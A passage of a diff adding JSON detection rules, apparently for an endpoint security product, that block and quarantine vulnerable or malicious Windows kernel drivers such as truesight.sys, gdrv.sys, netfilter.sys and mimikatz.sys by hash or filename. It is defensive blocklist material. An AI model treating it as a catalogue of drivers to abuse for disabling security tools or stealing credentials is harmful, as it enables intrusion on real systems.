+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9c832d3704fa2bab90a7eff166fc143f7ad14f8e2390224ce7fff4065a7bf266",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6b5e1f9d-75ef-5dbd-ab26-9fe8482ef160",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.808667Z",
+ "creation_date": "2026-03-23T11:45:31.808669Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.808675Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "35d7873d44f2dc85283378765ccaf73d81b9bbe97113aa10cca1a0386048f4f8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6b666413-53e3-5cf4-b79c-b7ae787c28a5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.977054Z",
+ "creation_date": "2026-03-23T11:45:29.977056Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.977061Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "filename",
+ "value": "WindowsKernelExplorer.sys",
+ "comment": "Malicious Windows Kernel Explorer Driver (aka WindowsKernelExplorer.sys) [https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6b712316-3bbc-547b-93d1-7031be42d17a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.606350Z",
+ "creation_date": "2026-03-23T11:45:29.606351Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.606357Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cd1beb64cd67169d57ca4dbc602a94f74891962221bb49c09abf3339ce35bc90",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6b7eb322-7599-57ef-97a1-79a86d1f9484",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.620352Z",
+ "creation_date": "2026-03-23T11:45:29.620354Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.620359Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9790a7b9d624b2b18768bb655dda4a05a9929633cef0b1521e79e40d7de0a05b",
+ "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6b874d3a-56d7-5fa5-b11d-0d576f6cb47e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.821655Z",
+ "creation_date": "2026-03-23T11:45:31.821657Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.821662Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e7401e82c5bc55dabde99f6c1cb3257d0bf11c7b10fd7567d0710ee1584671c0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6ba02586-2ef0-5e57-97ee-10e6deb7621a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.604843Z",
+ "creation_date": "2026-03-23T11:45:29.604845Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.604850Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "27cd6ce9797c1a477879b1045751ff8cb54facacb5176f381e17db8d62ebf96e",
+ "comment": "Process Hacker driver (aka kprocesshacker.sys) [https://processhacker.sourceforge.io/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6bacdcf1-0d18-5e54-b32b-eab628799243",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.146492Z",
+ "creation_date": "2026-03-23T11:45:31.146494Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.146500Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3c125ca2f5ea8abbb9ec563dd3208b3fda955b730c3c9362748900c3d59af9c8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6bc5833a-e484-5b9d-b14e-f00fa03078e2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.606900Z",
+ "creation_date": "2026-03-23T11:45:29.606902Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.606907Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "083828dd2e4afe22f5d27b56bd7f5a60e43aea7ec8f8cb0a138be84ee639a09c",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6bcacfb9-dfa4-5206-bd03-e39bcb888d9a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.812117Z",
+ "creation_date": "2026-03-23T11:45:31.812119Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.812124Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7a783f9ff531340c29d7c8301e2fca1a2d4580c664da4bfc5f7d08c3a6e80c15",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6bcbc73f-0a67-53cf-9f0f-e336f5c240b6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.967512Z",
+ "creation_date": "2026-03-23T11:45:29.967514Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.967520Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d0a03a8905c4f695843bc4e9f2dd062b8fd7b0b00103236b5187ff3730750540",
+ "comment": "Retliften malicious signed drivers (aka netfilter.sys) [https://msrc-blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6bcd326d-8c49-5b36-b361-7a4c36af7ab6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.612334Z",
+ "creation_date": "2026-03-23T11:45:29.612335Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.612341Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fb6b0d304433bf88cc7d57728683dbb4b9833459dc33528918ead09b3907ff22",
+ "comment": "ASUS WinFlash vulnerable driver (aka ATSZIO.sys and ATSZIO64.sys) [https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/ATSZIO.md] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6bcf078e-a957-5592-87b0-f77f9ef6a727",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.608928Z",
+ "creation_date": "2026-03-23T11:45:29.608930Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.608935Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427",
+ "comment": "Gigabyte vulnerable driver (aka gdrv.sys) [CVE-2018-19320] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6bcff632-d15e-5cf5-9368-546e98452cc6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.472795Z",
+ "creation_date": "2026-03-23T11:45:30.472799Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.472817Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4d5059ec1ebd41284b9cea6ce804596e0f386c09eee25becdd3f6949e94139ba",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6bd18258-f020-54b5-bdc9-8d83baa06920",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.452595Z",
+ "creation_date": "2026-03-23T11:45:30.452598Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.452606Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "43f88737fcdc8cd913ec2643c1841c87794f987e98b1432dd6220f769183467b",
+ "comment": "Malicious Kernel Driver (aka 1fc7aeeff3ab19004d2e53eae8160ab1.sys) [https://www.loldrivers.io/drivers/aaf8ce1a-e11b-4929-96e0-5ec0666cef2c/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6bd25302-32b6-5d83-a23b-ed8b7dad738e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.471563Z",
+ "creation_date": "2026-03-23T11:45:31.471567Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.471577Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ebb0ca636243f26c37d5172cb9290620a733b75400c5678174be0c22fc9ec9d3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6bd875fd-b393-5e79-8096-554a59ae5b80",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.475124Z",
+ "creation_date": "2026-03-23T11:45:31.475128Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.475137Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "70eb61b8464748d65366ad8d7ef9d971c6525bf556137c2603de2283a3f6933e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6be3a5e4-dd40-5d85-9e37-f7f4c1be723f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.462029Z",
+ "creation_date": "2026-03-23T11:45:30.462032Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.462041Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "deade507504d385d8cae11365a2ac9b5e2773ff9b61624d75ffa882d6bb28952",
+ "comment": "Malicious Kernel Driver (aka mimikatz.sys) [https://www.loldrivers.io/drivers/14556074-b235-4378-b356-f58721629d72/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6befa781-66a1-5aa1-82c2-f7efee44f44e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.967586Z",
+ "creation_date": "2026-03-23T11:45:29.967588Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.967593Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0c42fe45ffa9a9c36c87a7f01510a077da6340ffd86bf8509f02c6939da133c5",
+ "comment": "Retliften malicious signed drivers (aka netfilter.sys) [https://msrc-blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6befd971-db91-5895-9d4f-6dbf25976eca",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.823007Z",
+ "creation_date": "2026-03-23T11:45:31.823010Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.823018Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "11608d588b2fa812260ab29907f63eb05f692a61c0ebdb8ef2e9983ca04016fe",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6bf87be8-1d58-5d0b-8df0-9bcc347f543f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.818101Z",
+ "creation_date": "2026-03-23T11:45:30.818103Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.818109Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dfe57c6a4ef4d2491be325d67428698a61d9c5d2a24dbada10043d313be2c8cc",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6bf9df34-044f-5584-8334-86f78fc57637",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.976535Z",
+ "creation_date": "2026-03-23T11:45:29.976537Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.976542Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dcfab3c5f99c15cbb7df17c59914af551b90e0ed3c1dc040bad9927b12b67125",
+ "comment": "Malicious attestation-signed Drivers (aka NodeDriver.sys, 4.sys, Air_SYSTEM10.sys etc.) [https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6c0aeebe-57e3-5be2-8a83-0fbf2237a9c7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.827998Z",
+ "creation_date": "2026-03-23T11:45:31.828000Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.828007Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "29568e4c63b1ce1fd0a6482e934139b02b999bdb46213483c36540897deddb1b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6c0f2bec-8887-537f-8953-617f3bd42033",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
